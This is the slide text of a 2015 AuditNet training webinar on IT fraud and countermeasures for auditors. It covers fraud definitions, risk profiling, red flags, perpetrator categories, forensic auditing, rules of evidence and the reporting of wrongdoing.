More Related Content Similar to It52015 slides (20) More from Jim Kaplan CIA CFE (20) It52015 slides1. 5/12/2015
1
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
AuditNet® Training without Travel™
IT Fraud and Countermeasures May 12 2015
Guest Presenter:
Richard Cascarino,
MBA, CIA, CISM, CFE
Richard Cascarino &
Associates
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Jim Kaplan CIA CFE
• President and Founder of
AuditNet®, the global resource
for auditors (now available on
Apple and Android and Windows
devices)
• Auditor, Web Site Guru,
• Internet for Auditors Pioneer
• Recipient of the IIA’s 2007
Bradford Cadmus Memorial
Award.
• Author of “The Auditor’s Guide
to Internet Resources” 2nd
Edition
2. 5/12/2015
2
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Richard Cascarino MBA CIA CISM CFE
• Principal of Richard Cascarino &
Associates based in Colorado USA
• Over 30 years experience in IT
audit training and consultancy
• Past President of the Institute of
Internal Auditors in South Africa
• Member of ISACA
• Member of Association of Certified
Fraud Examiners
• Author of Auditor's Guide to IT
Auditing
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Webinar Housekeeping
• This webinar and its material are the property of AuditNet® and Richard Cascarino
and Associates. Unauthorized usage or recording of this webinar or any of its material
is strictly forbidden. We are recording the webinar and you will be provided with a link
access to that recording as detailed below. Downloading or otherwise duplicating the
webinar recording is expressly prohibited.
• Webinar recording link will be sent via email within 5-7 business days.
• NASBA rules require us to ask polling questions during the Webinar and CPE
certificates will be sent via email to those who answer ALL the polling questions
• The CPE certificates and link to the recording will be sent to the email address you
registered with in GTW. We are not responsible for delivery problems due to spam
filters, attachment restrictions or other controls in place for your email client.
• Submit questions via the chat box on your screen and we will answer them either
during or at the conclusion.
• After the Webinar is over you will have an opportunity to provide feedback. Please
complete the feedback questionnaire to help us continuously improve our Webinars
• If GTW stops working you may need to close and restart. You can always dial in and
listen and follow along with the handout.
3. 5/12/2015
3
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
• The views expressed by the presenters do not necessarily represent the
views, positions, or opinions of AuditNet® or the presenters’ respective
organizations. These materials, and the oral presentation accompanying
them, are for educational purposes only and do not constitute accounting
or legal advice or create an accountant‐client relationship.
• While AuditNet® makes every effort to ensure information is accurate and
complete, AuditNet® makes no representations, guarantees, or warranties
as to the accuracy or completeness of the information provided via this
presentation. AuditNet® specifically disclaims all liability for any claims or
damages that may result from the information contained in this
presentation, including any websites maintained by third parties and
linked to the AuditNet® website
• Any mention of commercial products is for information only; it does not
imply recommendation or endorsement by AuditNet®
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Today’s Agenda
• The nature of computer fraud
• The Corporate risk profile
• Computer fraud techniques
• Why computer fraud and who commits it?
• Fraud auditing
• Fraud awareness
• EDI and fraud
• Forensic auditing
• Sources of evidence and audit tools
• Legal evidence
• Reporting sensitive issues
4. 5/12/2015
4
Copyright © 2014 AuditNet® and Richard Cascarino & Associates 7
“Fraud and deceit abound in
these days more than in
former times”.
SIR EDWARD CODE (1602)
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
What is Fraud?
As a Crime
"Fraud is a generic term, and embraces all the
multifarious means which human ingenuity can
devise, which are resorted to by one individual,
to get an advantage over another by false
representations. No definite and invariable rule
can be laid down as a general proposition in
defining fraud, as it includes surprise, trick,
cunning, and unfair ways by which another is
cheated. The only boundaries defining it are
those which limit human knavery."
Michigan Criminal Law
5. 5/12/2015
5
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
What is Fraud?
IIA's Definition
Fraud encompasses an array of irregularities and illegal acts
characterized by intentional deception. It can be perpetrated for
the benefit of or to the detriment of the organisation and by
persons outside as well as inside the organisation - IIA
Why is Fraud Committed?
Achieve a personal or organizational goal
Satisfy a human need
Why by dishonest means?
Keen and predatory competition
Economic survival
"All's fair in love and war"
"Business is amoral anyway"
"Because it's easy"
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
What is IT Fraud?
A fraud in which a computer is used to
commit or abet the fraud
A fraud in which the computer is itself
the victim
Includes
Embezzlement
Theft of property
Theft of proprietary information
Forgery
Counterfeiting
Electronic eavesdropping
Exceeding the user's authority
Impersonation of a authorized user
6. 5/12/2015
6
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
New Crime?
Changed form of older crimes
Electronic entries in the books
An occupational crime requiring
Skills
Knowledge
Access
Easier for the insider than the outsider
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Nature of IT Fraud - 1
Changes to Source Documents
Prior to Processing
Unauthorized On-line Access
Piggy Backing
Impersonation
Fictitious Transactions
Unauthorized Programs
Unauthorized Reports
Direct Changes to Programs, Data,
Output
Using Utilities or Special Programs
7. 5/12/2015
7
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Nature of IT Fraud - 2
Trojan Horse / Logic Bombs / Trap Doors
Use of Unauthorized Coding
Salami Techniques
A small amount from everyone
Viruses
Mainframe as well as Micro
Sabotage and Industrial Espionage
Degrading Systems Performance
Leaking Confidential Information
Management Fraud
Cooked Books
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
MOMM Concept
Motivation
Economic - financial gain
Ideological - normally revenge
Egocentric - need to show off
Psychotic - distorted sense of reality
Opportunities
Inadequate Systems Controls
Accounting Control
Access Control
Inadequacy in Management Controls
Reward System
Ethical Climate
Climate for Trust
Means
Compromising Controls / Personnel / Technology
Methods
Input Scams / Throughput Scams / Output Scams
8. 5/12/2015
8
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Polling Question 1
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Knowledge of the organization's business and
industry
Determination of the nature of the business and the
way it is conducted
Identification of any special legal or commercial
requirements
Identification of any industry-specific accounting
principles or policies
Identification of any significant information relied
upon by management in the control of the business
Identification of high-level control and operating
issues
Establishing the
Corporate Risk Profile
9. 5/12/2015
9
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Areas to be Covered
Organizational structure
Key executive responsibilities
Role of the Board of Directors, Audit
Committee, Internal Auditors
Management's judgments and integrity
Performance planning and monitoring
Policies and procedures for control and
accountability
Nature and organisation of
Computerized Information
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Primary Objectives - 1
To determine
Level of risk inherent in the organization's
business environment
Appropriateness of the organizational structure
Appropriateness of levels of authority within
the internal control structures
Apparent quality of management's judgments
and estimates
Whether the environment is likely to be
conducive to maintaining reliable internal
controls
10. 5/12/2015
10
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Primary Objectives - 2
Extent to which management decision making is
influenced by Information Systems
Extent of asset control exercised by Information
Systems
Degree of reliance on revenues recorded on
Information Systems
Degree of reliance on expenses recorded on
Information Systems
Volume and average value of transactions
through Information Systems
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Other Items to Determine
Quality of personnel recruitment
Corporate ethical climate
Systems of authority
Quality of Internal Control
Scope and skills of audit
11. 5/12/2015
11
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
IT Risk Management
Accept the risk
Reduce the risk
Transfer the risk
NOT
Ignore the risk
Knowing the risk
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Risk Profile Assessment
Must be
Simple
Practical
Quick
Common-sense
Business oriented
Technically competent
12. 5/12/2015
12
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Establishing a Risk Profile
Involves Assessment of
Physical security
Personnel security
Data security
Applications software security
Systems software security
Telecommunications security
Operations security
Quantification of the risk factors
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Risk Ranking - 1
Business Risk
Nature of Transactions
Value per transaction
Total daily value of transactions
Total accountability
Liquidity
Data
Nature of Operating Environment
Impact on users
Pressure
Functional complexity
Processing sophistication
13. 5/12/2015
13
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Risk Ranking - 2
Performance Risk
Controls and Security
Access
Environmental
Verification of value of data
Verification of records
Separation / Rotation of duties
Completeness of records
Accountability
Accounting principles
External reviews
Documentation
Contingency Planning
Use as Management Information
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Most Common Frauds
False vendor, supplier or contractor
invoice
False governmental claim
False fringe benefit claim
False refund or credit claim
False payroll claim
False expense claim
14. 5/12/2015
14
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Where are we Vulnerable?
Information Processing Center
Networks
Input Origination
Input Entry
Processing
Output Handling
Output Disposal
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Polling Question 2
15. 5/12/2015
15
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Fraud Symptoms, Red Flags
and Fraud Indicators
Operating performance anomalies
Organisational Structure
Management characteristics
Accounting anomalies
Internal control weaknesses
Analytical anomalies
Unusual behaviour
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Operating Performance
Anomalies
Unexplained changes in Financial
Statement balances.
Urgent need to report favourable
earnings
High debt or interest burdens
Cash flow problems
Unusual or large and profitable
transactions near the end of
accounting periods
16. 5/12/2015
16
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Accounting Anomalies
Missing documents.
Excessive voids or credits.
Increased reconciliation items.
Alterations on documents.
Duplicate payments.
Common names or addresses of
payees or customers
Increased past due accounts.
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Internal Control
Weaknesses
Lack of segregation of duties
Lack of physical safeguards
Lack of independent checks
Lack of proper authorisation
Lack of proper documents and records
Overriding of existing controls
17. 5/12/2015
17
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Common Data Fraud Areas
Corporate card fraud
Invoicing for goods not delivered
Duplicate Invoices
Kickbacks / Bribes
Increasing of Invoiced amounts and
splitting the monies
Fictitious / Ghost employees
Carrying Employees on payrolls beyond
actual severance dates
Overtime fraud
Cheque fraud
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Common Mistakes
• Failure to maintain proper documentation
• Failure to notify decision makers
• Failure to control digital evidence
• Failure to report the incident in a timely manner
• Underestimating the scope of the incident
• No incident response plan in place
• Technical mistakes
– Altering date and time stampson evidence systems before
recording them
– Killing rogue processes
– Patching the system back together before investigation
– Not recording commands used
– Using untrusted commands and tools
– Overwriting evidence by installing tools
18. 5/12/2015
18
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Access to Records
Normal Input Transactions
Changes to Operating System Software
Changes to Application Programs
Physical Substitution of Stored Data
Use of Unauthorized Programs
Changes to / Substitutions of Output
Reports
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Polling Question 3
19. 5/12/2015
19
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Who Commits Computer
Fraud?
Users
Management
IT Auditors
IT Staff
Outsiders
Collusion
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Users
Have access to assets
Have legitimate access to computer
systems
Have adequate (too much?) authority
levels
Know the systems weaknesses
May be responsible for error handling
Account for almost 50% of all computer
fraud
20. 5/12/2015
20
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Management
Also have access to assets
Also have legitimate access to computer
systems
May have override authorities
Know the systems weaknesses (Audit
told them)
May be responsible for reconciliations
Are responsible for internal control
Account for some 15% of computer
fraud
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
IT Auditors
May have access to assets
Have legitimate access to computer
systems
Often have too much authority within
systems
Know the system weaknesses
Account for some 5% of computer fraud
21. 5/12/2015
21
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
IT Staff
Usually do not have access to assets
except where the data is itself the asset
Should not have access to live systems
but often do
May be able to bypass system controls
May not know of, or be able to affect
user controls
May design / program in fraud
Account for some 3% of computer fraud
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Outsiders
Usually have no access to assets
Usually do not know the systems
Cause damage more than fraud
Have the requisite skill levels
Know the environmental weaknesses
Account for less than 1% of computer
fraud
Is a potential growth area
22. 5/12/2015
22
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Collusion
Is the hardest to detect / prevent / prove
Access to assets is available
Access to systems is available
Weaknesses are known
Needed authorities are available
Internal control may be exercised by the
very perpetrators
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
What is Fraud Auditing?
Creation of an environment that encourages the
detection and prevention of fraud in commercial
transactions
Combination of
Audit skills
Computer skills
Criminal-investigative skills
Not a checklist
Includes
Human element
Organizational behavior
Knowledge of fraud
Evidence and standards of proof
23. 5/12/2015
23
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Principles of Fraud
Auditing
Less a methodology, more an attitude
Focus is on
Exceptions
Oddities
Accounting irregularities
Patterns of conduct
Primarily learned from experience (think like a thief)
Materiality is not a major issue
Fraud may come at any stage (Input / Processing /
Output)
Most common schemes perpetrated by lower-level
employees
Most common schemes involve disbursements
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Most higher-level frauds involve "profit
smoothing"
Deferring expenses
Booking sales too early
Overstating inventory
Kiting sales
Frauds are more often caused by the absence of
controls than by loose controls
Most frauds are found by accident
Fraud losses are growing exponentially
Most effective prevention a combination of
adequate Internal Controls and an ethical climate
Principles of Fraud
Auditing
24. 5/12/2015
24
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Fraud Questions?
What is the nature of the system?
Where are the weak links?
What deviations are possible?
Who can access?
Who can authorize?
What is the simplest way to compromise
the system?
Who has bypass capability?
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Fraud Auditor's Objective
To determine whether a fraud, theft or
embezzlement has occurred
Is there a criminal law?
Was there an apparent breach of that
law?
Who was the perpetrator?
Who was the victim?
How can it be proven?
25. 5/12/2015
25
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Detection Awareness
for the Fraud Auditor
Invitations to theft
High Fraud Environments
Low Fraud Environments
Red Flags and Indicators
Fraud Detection
Control and Overcontrol
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Approaches to Fraud
Detection
Reactive
Allegations and Complaints
Suspicions
Intuition
Proactive
Adequate Internal Controls
Periodic Audits
Intelligence gathering
Review of Variances
Logging of Exceptions
Control and Overcontrol
26. 5/12/2015
26
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Polling Question 4
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
EDI and Fraud
What is Electronic Data Interchange
Systems allowing the movement of money with:
Immediate / Same Day Value
- Transaction
Immediate Advisement / Confirmation
- Information
On-line Intra-day Monitoring / Credit
- Credit
Remote, User-friendly Initiation / Reporting
- Access
Full Electronic Audit Trail
- Service
Enhanced Data Security / Disaster Recovery
- Security
27. 5/12/2015
27
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
What is Forensic Accounting
Forensic "belonging to, used in, or suitable
to courts of judicature or to public
discussion and debate" - Webster
Not always criminally related
Forensic Accounting relates to evidence
suitable for a court of law - either civil or
criminal
Reactive rather than proactive
Forensic accountant deals with
Criminal Complaints
Civil Statements of claim
Corporate Rumors and inquiries
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Required of the Forensic
Computer Auditor - 1
A knowledge of accounting
A knowledge of the business sector
A knowledge of the computer systems
Hardware
Software
Operating environment
Threats
Vulnerabilities
28. 5/12/2015
28
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Experience and judgment
A knowledge of investigative techniques
A knowledge of evidence
A knowledge of relevant statutes
Required of the Forensic
Computer Auditor - 2
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Scope of Forensic Auditing
Not restricted by materiality
Not restricted by Generally Accepted
Accounting Standards
Use of sampling is not generally
acceptable in procuring evidence
Assumption of integrity of management
and documentation
An opinion on the findings may not be
required
Search for "Best Evidence"
29. 5/12/2015
29
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Evidence Required
Job role of the suspect
Degree of control normally exercised by the
suspect
Access rights (required and actual)
Knowledge by the suspect of the computer system
Extent of the fraud
Systematic pattern used in covering up the fraud
Financial position of the suspect (motive and
benefit)
If in doubt err on the side of the suspect
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Sources of Evidence
and Audit Tools
Non-computer evidence
Computer evidence
Non-computer audit tools and
techniques
Computerized audit tools and
techniques
30. 5/12/2015
30
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Non-computer Evidence
System Documentation
Interviews with Users / IS staff
Procedure Manuals
Job Descriptions
Authority Matrices
Security Environment
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
System Documentation
Flowcharts
Record Layouts
Error Lists
Input Documents
Output Reports
Narrative Descriptions
Clerical Instructions
31. 5/12/2015
31
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Additional Documentation
Data Retention Requirements
User Procedure Manuals
User Override Authorities
"UNOFFICIAL" Documentation
Run Logs
Run Schedules
Timesheets
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Interviews
Interviews reflect opinions not facts
Many frauds are discovered by tip-off
The "Honest Broker"
Non-verbal clues
Document all Interviews immediately
32. 5/12/2015
32
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Polling Question 5
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Computer Evidence
Input Documents
Run Logs
Outputs Produced
Output from Audit Tests
Access Logs
Authority Lists
33. 5/12/2015
33
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Non-Computer Tools and
Techniques
"ANY TANGIBLE AID"
Tools to obtain information
Interviews
Questionnaires
Analytical audit flowcharts
Flowcharting software
Documentation review
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Non-Computer Tools and
Techniques
"Tools to evaluate controls
Application control cube
IT areas
Components
Threats
Adequate
Inadequate
34. 5/12/2015
34
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Non-Computer Tools and
Techniques
Tools to verify controls
Audit around
Test data
Reperformance of key functions
Reprocess selected items
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Computer Tools and
Techniques
Automated tools (CAATS)
Test data generators
Flowcharting packages
Specialized audit software
Generalized audit software
Utility programs
Specialized Audit Software
Can accomplish any audit task but
High development and maintenance cost
Require specific I.S. Skills
Must be "verified" if not written by the auditor
High degree of obsolescence
35. 5/12/2015
35
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Computer Tools and
Techniques
Generalized Audit Software
"Prefabricated" audit tests
Each use is a one-off
Auditor has direct control
Lower development cost
Fast to implement
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Applications of Generalized
Audit Software
Detective examination of files
Verification of processing controls
file interrogations
Management inquiries
Types of audit software
Program generators
Macrolanguages
Audit-specific tools
Data downloaders
Micro-based software
36. 5/12/2015
36
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Audit Software Functions
File access
Format access
Arithmetic operations
Logic operations
Record handling
Update
Output
Statistical
File comparison
Graphics
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Legal Evidence and Rules
for Prosecution
What is Evidence?
Rules of Evidence
Legal vs Audit Evidence
Use of Computer Evidence
37. 5/12/2015
37
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
What is Evidence?
Something intended to prove or support
a belief
Each piece may be flawed
Personal bias
Potential error of measurement
Less competent than desirable
In total the "body of evidence"
Should provide a factual basis for audit
opinions
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Standards of Audit Evidence
IIA Standards state that auditors
“should collect, analyze, interpret and
document information to support audit
results"
Information should be
Related to the audit objectives
Pertinent to the scope of work
Systematically gathered
38. 5/12/2015
38
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Rules of Evidence
Primarily designed for legal evidence
May have to be complied with in legal
cases
Evidence whose value as proof is offset
by a prejudicial effect may be excluded
The auditor is not normally so restricted
Any evidence
Professional judgment
Until the auditor is satisfied
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Legal vs Audit Evidence
Common objective
Provide proof
Foster an honest belief
Different focus
Legalrelies heavily on oral evidence
Auditrelies more on documentary evidence
Legal Evidence must be lawfully
gathered
39. 5/12/2015
39
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Relevant Evidence
Evidence regarding
Motive for the crime
Ability of defendant to commit the crime
Opportunity to commit the crime
Threats by the suspect
Means to commit the crime
Evidence linking the suspect to the actual
crime
Suspect's conduct and comments at the time of
arrest
Attempt to conceal User identity
Attempt to destroy evidence
Valid confessions
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Chain of Custody
Evidence obtained should be
Marked
Identified
Inventoried
Preserved
If gaps in the chain of custody occur
Evidence may be ruled invalid
40. 5/12/2015
40
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Polling Question 6
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Reporting Sensitive Issues
Internal Auditor "the eyes and ears of management"
Reporting to legal authorities and media neither
required nor encouraged by IIA
Where such reporting is required by law then IIA
requires compliance
Code of Ethics require loyalty in all matters
pertaining to the operations of the employer except
where in conflict with legal issues
Mandated to report wrongdoings internally as a
minimum
State of Virginia has laws protecting Internal
Auditors from firing for whistle-blowing
41. 5/12/2015
41
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
From a US Survey of 8000
Employees - 1
Most employees believe reporting wrongdoing
is ethical and morally right
Most employees who observe wrongdoing do
not report it to anyone
Internal auditors whose job entails reporting are
more likely to report wrongdoing
Employees who observe serious, well-
documented, or frequent wrongdoings are
more likely to report it
Employees who observe wrongdoings are more
likely to report when their organization's policies
encourage them to do so
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
A substantial number, though not a majority, of
employees who report wrongdoing suffer
retaliation of some sort, particularly when the
reporting is externalized
Retaliation is more likely if the wrongdoing is
serious
Internal Auditors suffer retaliation at about the
same rate as other employees, even though they
are mandated to report wrongdoing
From a US Survey of 8000
Employees - 2
42. 5/12/2015
42
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Steps in Deciding to Report
Did wrongdoing occur?
Does the wrongdoing require action?
Am I responsible for acting?
What actions are available to me?
Will the benefits of acting outweigh the
costs?
Has previous action proved beneficial to
all parties?
Was my action effective?
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Questions?
• Any Questions?
Don’t be Shy!
43. 5/12/2015
43
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Coming Up Next
IT AUDIT ADVANCED
1. Advanced IT Audit Risk Analysis for Auditors May 19
2. Advanced IT Audit Securing the Internet May 21
3. Advanced IT Audit IT Security Reviews May 26
4. Advanced IT Audit Performance Auditing of the IT
Function May 28
5. Advanced IT Audit Managing the IT Audit Function June 2
Copyright © 2014 AuditNet® and Richard Cascarino & Associates
Thank You!
Richard Cascarino, MBA, CIA, CISM, CFE
Richard Cascarino & Associates
970-291-1497
rcasc@rcascarino.com
Jim Kaplan
AuditNet LLC®
800-385-1625
www.auditnet.org
webinars@auditnet.org